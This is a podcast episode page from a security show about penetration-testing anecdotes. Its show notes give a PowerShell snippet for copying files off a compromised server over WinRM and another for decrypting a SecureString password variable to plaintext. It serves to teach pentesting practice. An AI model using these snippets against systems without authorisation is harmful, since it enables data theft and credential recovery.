7MS #589: Tales of Pentest Pwnage - Part 51
7 Minute Security15 Sep 2023

7MS #589: Tales of Pentest Pwnage - Part 51

In today's tale of pentest pwnage we talk about:

  • The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure

  • Copying files via WinRM when copying over SMB is blocked:

$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *

...then provide your creds...and then:

copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sess
  • If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))

Episoder(715)

7MS #114: PCI Pentesting 101-Part 3

7MS #114: PCI Pentesting 101-Part 3

Part 3 on my series about PCI pentesting. Yeah. That.

2 Des 20157min

7MS #113: Big Bag of Random Security Stuff

7MS #113: Big Bag of Random Security Stuff

Yep, this episode is EXACTLY what the title implies.

27 Nov 201510min

7MS #112: This is Sparta!

7MS #112: This is Sparta!

This episode is about one of my favorite enumeration tools called Sparta - it's built right into Kali 2. And maybe it was in Kali 1 and I totally missed it. But whatevs. I'm happy to have found it now...

25 Nov 20158min

7MS #111: Hacking WPA Enterprise-Part 2

7MS #111: Hacking WPA Enterprise-Part 2

The thrilling (?) conclusion of my experience hacking WPA Enterprise.

20 Nov 20156min

7MS #110: Hacking WPA Enterprise-Part 1

7MS #110: Hacking WPA Enterprise-Part 1

This episode is about my experience hacking WPA enterprise. Huge mega tiger uppercut thanks to this site for giving me the fixes I needed to get this working on Kali2! https://warroom.securestate.com/...

17 Nov 20158min

7MS #109: OFFTOPIC-It Follows and Backcountry

7MS #109: OFFTOPIC-It Follows and Backcountry

Movie reviews of It Follows and Backcountry.

13 Nov 20157min

7MS #108: I'm Going to PWAPT!-Part 2

7MS #108: I'm Going to PWAPT!-Part 2

Here's part 2 (of probably several to come) about my experience with PWAPT (Practical Webapp Pentesting) training last week!

11 Nov 201510min

7MS #107: I'm Going to PWAPT!

7MS #107: I'm Going to PWAPT!

Hey I'm going to PWAPT this week (http://www.eventbrite.com/e/practical-web-application-penetration-testing-with-tim-tomes-lanmaster53-tickets-16718889649), so in this episode I talk about that...and ...

3 Nov 20157min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
lydartikler-fra-aftenposten
forklart
aftenpodden-usa
popradet
stopp-verden
i-retten
dine-penger-pengeradet
fotballpodden-2
det-store-bildet
rss-gukild-johaug
nokon-ma-ga
hanna-de-heldige
rss-ness
aftenbla-bla
e24-podden
rss-dannet-uten-piano
grasoner-den-nye-kalde-krigen
frokostshowet-pa-p5